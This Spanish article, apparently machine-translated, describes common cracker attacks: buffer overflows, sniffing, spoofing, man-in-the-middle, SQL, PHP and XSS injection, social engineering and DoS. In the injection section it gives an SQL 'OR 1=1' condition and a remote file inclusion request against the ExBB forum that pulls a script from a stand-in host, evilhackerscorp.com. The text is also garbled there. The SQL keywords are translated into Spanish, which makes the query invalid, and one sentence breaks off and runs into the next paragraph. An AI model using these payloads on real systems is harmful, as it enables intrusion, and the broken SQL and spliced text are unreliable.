Un ataque de piratas informáticos en el sentido estricto de la palabra: en la actualidad, la frase se entiende como un "Asalto a un sistema de seguridad", y tiende más al significado del siguiente término Ataque de cracker . Esto se debió a una tergiversación del significado de la palabra " hacker ".
Un ataque de piratas informáticos en el sentido amplio de la palabra (significado original) es una sesión de lluvia de ideas destinada a encontrar formas de resolver problemas complejos. Uno o más especialistas de clase alta ( hackers ) pueden participar en un ataque de hackers. Como resultado de la lluvia de ideas, se pueden inventar métodos no convencionales para resolver un problema o se pueden hacer ajustes de optimización a los métodos existentes.
Un ataque de cracker es una acción destinada a tomar el control (elevar los derechos) sobre un sistema informático remoto/local, desestabilizarlo o denegar el servicio.
Se considera el método de ataque más antiguo, aunque su esencia es simple y primitiva: una gran cantidad de mensajes de correo imposibilitan trabajar con buzones, y en ocasiones con servidores de correo completos . Se han desarrollado muchos programas para este propósito, e incluso un usuario inexperto podría realizar un ataque especificando solo el correo electrónico de la víctima , el texto del mensaje y la cantidad de mensajes necesarios. Muchos de estos programas permitieron ocultar la dirección IP real del remitente, utilizando un servidor de correo anónimo para el envío de correos . Este ataque es difícil de prevenir, ya que incluso los filtros de correo del ISP no pueden determinar el verdadero remitente del spam . El proveedor puede limitar la cantidad de correos electrónicos de un solo remitente, pero la dirección y el asunto del remitente a menudo se generan aleatoriamente .
Quizás uno de los tipos de ataques más comunes en Internet. El principio de este ataque se basa en el uso de errores de software que permiten causar una violación de la memoria y bloquear la aplicación o ejecutar código binario arbitrario en nombre del usuario bajo el cual se ejecutaba el programa vulnerable. Si el programa se ejecuta con la cuenta de administrador del sistema, este ataque le permitirá obtener control total sobre la computadora de la víctima, por lo que se recomienda trabajar con la cuenta de un usuario común con derechos limitados en el sistema y realizar solo operaciones que requieran derechos administrativos bajo la cuenta de administrador del sistema.
El siguiente tipo de ataque es un método más sofisticado para obtener acceso a información clasificada: el uso de programas especiales para trabajar en la computadora de la víctima, así como una mayor distribución (estos son virus y gusanos). Dichos programas están diseñados para buscar y transferir información secreta a su propietario, o simplemente para dañar el sistema de seguridad y el rendimiento de la computadora de la víctima. Los principios operativos de estos programas son diferentes.
Durante un ataque de este tipo, el cracker en realidad no realiza ninguna acción destructiva, pero como resultado, puede obtener información confidencial sobre la construcción y los principios de funcionamiento del sistema informático de la víctima. La información obtenida se puede utilizar para construir de manera competente el próximo ataque y, por lo general, se realiza en las etapas preparatorias.
En el curso de dicho reconocimiento, un atacante puede realizar escaneos de puertos , consultas de DNS , hacer ping a puertos abiertos, la presencia y seguridad de servidores proxy . Como resultado, puede obtener información sobre las direcciones DNS existentes en el sistema, quién las posee, qué servicios están disponibles en ellas, el nivel de acceso a estos servicios para usuarios externos e internos.
También es un tipo de ataque bastante común basado en el funcionamiento de una tarjeta de red en modo promiscuo , así como en modo monitor para redes Wi-Fi . En este modo, todos los paquetes recibidos por la tarjeta de red se envían para su procesamiento a una aplicación especial llamada sniffer . Como resultado, un atacante puede obtener una gran cantidad de información de servicio: quién, desde dónde y dónde transmitió los paquetes, a través de qué direcciones pasaron estos paquetes. El mayor peligro de un ataque de este tipo es obtener la información en sí, como los nombres de usuario y las contraseñas de los empleados, que pueden usarse para ingresar ilegalmente al sistema bajo la apariencia de un empleado común de la empresa.
También un tipo de ataque habitual en redes insuficientemente protegidas, cuando un atacante se hace pasar por un usuario autorizado, ya sea dentro o fuera de la propia organización. Para hacer esto, el cracker necesita usar una dirección IP que esté permitida en el sistema de seguridad de la red. Tal ataque es posible si el sistema de seguridad permite la identificación del usuario solo por dirección IP y no requiere confirmaciones adicionales.
Un tipo de ataque cuando un atacante intercepta el canal de comunicación entre dos sistemas y obtiene acceso a toda la información transmitida. Al obtener acceso a este nivel, un atacante puede modificar la información de la manera que necesita para lograr sus objetivos. El propósito de dicho ataque es obtener, robar o falsificar ilegalmente la información transmitida u obtener acceso no autorizado a los recursos de la red. Dichos ataques son extremadamente difíciles de rastrear, ya que el atacante generalmente se encuentra dentro de la organización.
Una familia de ataques unidos por un principio común: como resultado del ataque, los datos se ejecutan como código.
La inyección SQL es un ataque en el quese cambian los parámetros de las consultas SQL a la base de datos. Como resultado, la solicitud adquiere un significado completamente diferente y, en caso de filtrado insuficiente de los datos de entrada, no solo puede mostrar información confidencial, sino también cambiar/eliminar los datos. Muy a menudo, este tipo de ataque se puede observar en el ejemplo de sitios que utilizan parámetros de línea de comandos (en este caso, variables de URL ) para generar consultas SQL a bases de datos sin la validación adecuada [1] .
SELECCIONE la lista de campos DE la tabla DONDE id = 23 O 1 = 1;En lugar de verificar, puede sustituir una declaraciónLa inyección de PHP es una de las formas de hackear sitios web que se ejecutan en PHP . Consiste en inyectar un script malicioso especialmente diseñado en el código de la aplicación web en el lado del servidor del sitio, lo que conduce a la ejecución de comandos arbitrarios. Se sabe que muchos motores y foros gratuitos que se ejecutan en PHP que están muy extendidos en Internet (la mayoría de las veces se trata de versiones desactualizadas) tienen módulos mal concebidos o estructuras separadas con vulnerabilidades. Los crackers analizan dichas vulnerabilidades como variables sin escape que reciben valores externos. Por ejemplo, los piratas informáticos explotan la antigua vulnerabilidad del foro ExBB con la solicitud: GET /modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt.
Cross Site Scripting o XSS ( abreviado del inglés Cross Site Scripting , que no debe confundirse con CSS ( Hoja de estilo en cascada )) es un tipo de vulnerabilidad que se encuentra comúnmente en las aplicaciones web y que permite a usuarios maliciosos inyectar código en páginas web vistas por otros usuarios. . Ejemplos de dicho código son el código HTML y los scripts del lado del cliente, más comúnmente JavaScript .
La inyección XPath es un tipo de vulnerabilidad que consiste en inyectar expresiones XPath en la solicitud original a una base de datos XML . Al igual que con otros tipos de inyección, la vulnerabilidad es posible debido a una validación insuficiente de los datos de entrada.
Autocompletar es una inyección web que funciona según el principio de los troyanos, cuyo objetivo principal es infiltrarse en la cuenta del usuario en el sistema de pago , cambiar imperceptiblemente los datos de la transacción modificando el código HTML y transferir los fondos del usuario a la cuenta del atacante.
Ingeniería social (del inglés social engineering ) - el uso de la incompetencia, incompetencia o negligencia del personal para obtener acceso a la información. Este método generalmente se aplica sin una computadora, usando un teléfono o correo ordinario. De esta forma, se suele obtener una gran variedad de información. En el curso de un ataque de este tipo, el atacante establece contacto con la víctima y, engañando o ganando confianza, intenta obtener la información necesaria que es difícil de obtener de otra manera, u otras formas son más riesgosas.
DoS (del inglés. Denial of Service - Denegación de servicio): un ataque destinado a hacer que el servidor no responda a las solicitudes. Este tipo de ataque no implica la obtención de información secreta, pero a veces es una ayuda para iniciar otros ataques. Por ejemplo, algunos programas, debido a errores en su código, pueden causar excepciones y, cuando los servicios están deshabilitados, pueden ejecutar código proporcionado por un atacante o ataques de inundación cuando el servidor no puede procesar una gran cantidad de paquetes entrantes.
DDoS (del inglés Distributed Denial of Service - Distributed DoS) es un subtipo de ataque DoS que tiene el mismo objetivo que DoS, pero no se realiza desde una computadora, sino desde varias computadoras en la red. Estos tipos de ataques utilizan la ocurrencia de errores que conducen a la denegación del servicio, o la operación de protección, lo que lleva al bloqueo del funcionamiento del servicio y, como resultado, también a la denegación del servicio. DDoS se usa cuando el DoS regular no es efectivo. Para hacer esto, se combinan varias computadoras y cada una realiza un ataque DoS en el sistema de la víctima. En conjunto, esto se denomina ataque DDoS. El tamaño de una red de bots puede oscilar entre varias decenas y varios cientos de miles de ordenadores.
Cualquier ataque no es más que un intento de utilizar la imperfección del sistema de seguridad de la víctima para obtener información o para dañar el sistema, por lo tanto, la razón de cualquier ataque exitoso es la profesionalidad del cracker y el valor de la información, así como la falta de competencia del administrador del sistema de seguridad , en particular, la imperfección del software y la atención insuficiente a los problemas de seguridad en la empresa en su conjunto.